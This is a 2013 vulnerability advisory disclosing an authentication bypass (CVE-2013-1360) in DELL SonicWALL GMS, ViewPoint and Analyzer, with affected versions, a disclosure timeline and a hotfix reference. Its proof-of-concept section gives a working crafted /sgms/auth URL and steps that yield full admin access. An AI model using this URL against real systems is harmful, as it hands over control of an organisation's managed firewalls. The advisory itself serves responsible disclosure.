DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass

`______________________________________________________________________  
-------------------------- NSOADV-2013-002 ---------------------------  
  
SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)  
______________________________________________________________________  
______________________________________________________________________  
  
111101111  
11111 00110 00110001111  
111111 01 01 1 11111011111111  
11111 0 11 01 0 11 1 1 111011001  
11111111101 1 11 0110111 1 1111101111  
1001 0 1 10 11 0 10 11 1111111 1 111 111001  
111111111 0 10 1111 0 11 11 111111111 1 1101 10  
00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100  
10111111 0 01 0 1 1 111110 11 1111111111111 11110000011  
0111111110 0110 1110 1 0 11101111111111111011 11100 00  
01111 0 10 1110 1 011111 1 111111111111111111111101 01  
01110 0 10 111110 110 0 11101111111111111111101111101  
111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111  
111110110 10 0111110 1 0 0 1111111111111111111111111 110  
111 11111 1 1 111 1 10011 101111111111011111111 0 1100  
111 10 110 101011110010 11111111111111111111111 11 0011100  
11 10 001100 0001 111111111111111111 10 11 11110  
11110 00100 00001 10 1 1111 101010001 11111111  
11101 0 1011 10000 00100 11100 00001101 0  
0110 111011011 0110 10001 101 11110  
1011 1 10 101 000001 01 00  
1010 1 11001 1 1 101 10  
110101011 0 101 11110  
110000011  
111  
______________________________________________________________________  
______________________________________________________________________  
  
Title: SonicWALL GMS/Viewpoint/Analyzer  
Authentication Bypass (/sgms/)  
Severity: Critical  
CVE-ID: CVE-2013-1360  
CVSS Base Score: 9  
Impact: 8.5  
Exploitability: 10  
CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C  
Advisory ID: NSOADV-2013-002  
Found Date: 2012-04-26  
Date Reported: 2012-12-13  
Release Date: 2013-01-17  
Author: Nikolas Sotiriu  
Website: http://sotiriu.de  
Twitter: http://twitter.com/nsoresearch  
Mail: nso-research at sotiriu.de  
URL: http://sotiriu.de/adv/NSOADV-2013-002.txt  
Vendor: DELL SonicWALL (http://www.sonicwall.com/)  
Affected Products: GMS  
Analyzer  
UMA  
ViewPoint  
Affected Platforms: Windows/Linux  
Affected Versions: GMS/Analyzer/UMA 7.0.x  
GMS/ViewPoint/UMA 6.0.x  
GMS/ViewPoint/UMA 5.1.x  
GMS/ViewPoint 5.0.x  
GMS/ViewPoint 4.1.x  
Remote Exploitable: Yes  
Local Exploitable: No  
Patch Status: Vendor released a patch (See Solution)  
Discovered by: Nikolas Sotiriu  
  
  
  
Background:  
===========  
  
The SonicWALL® Global Management System (GMS) provides organizations,  
distributed enterprises and service providers with a powerful and  
intuitive solution to centrally manage and rapidly deploy SonicWALL  
firewall, anti-spam, backup and recovery, and secure remote access  
solutions. Flexibly deployed as software, hardware, or a virtual  
appliance, SonicWALL GMS offers centralized real-time monitoring, and  
comprehensive policy and compliance reporting. For enterprise customers,  
SonicWALL GMS streamlines security policy management and appliance  
deployment, minimizing administration overhead. Service Providers can  
use GMS to simplify the security management of multiple clients and  
create additional revenue opportunities. For added redundancy and  
scalability, GMS can be deployed in a cluster configuration.  
  
(Product description from Website)  
  
  
  
Description:  
============  
  
DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that  
allows an unauthenticated, remote attacker to bypass the Web interface  
authentication offered by the affected product.  
  
The vulnerability is attributed to a broken session handling in the  
process of password change process of the web application.  
changing in the web application.  
  
An attacker may exploit this vulnerability by sending a specially  
crafted request to the SGMS Interface (/sgms/).  
  
The attacker gains full administrative access to the interface and  
full control over all managed appliances, which could lead to a full  
compromisation of the organisation.  
  
  
  
Proof of Concept :  
==================  
  
Access the following URL to login to the sgms interface:  
  
http://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663  
83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092  
4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000  
00000000001  
  
If the Console is not directly shown, type any password you  
want in the change password dialog twice and hit submit to login.  
  
Maybe you need to access the following URL after this process:  
  
http://host/sgms/auth  
  
  
  
Solution:  
=========  
  
Install Hotfix 125076.77. (Download from www.mysonicwall.com)  
  
  
  
Disclosure Timeline:  
====================  
  
2012-04-26: Vulnerability found  
2012-12-12: Sent the notification and disclosure policy and asked  
for a PGP Key ([email protected])  
2012-12-13: Sent advisory, disclosure policy and planned disclosure  
date (2012-12-28) to vendor  
2012-12-18: SonicWALL analyzed the finding and wishes to delay the  
release to the 3. calendar week 2013.  
2012-12-18: Changed release date to 2013-01-17.  
2012-12-20: Patch is published  
2013-01-17: Release of this advisory  
  
  
  
  
`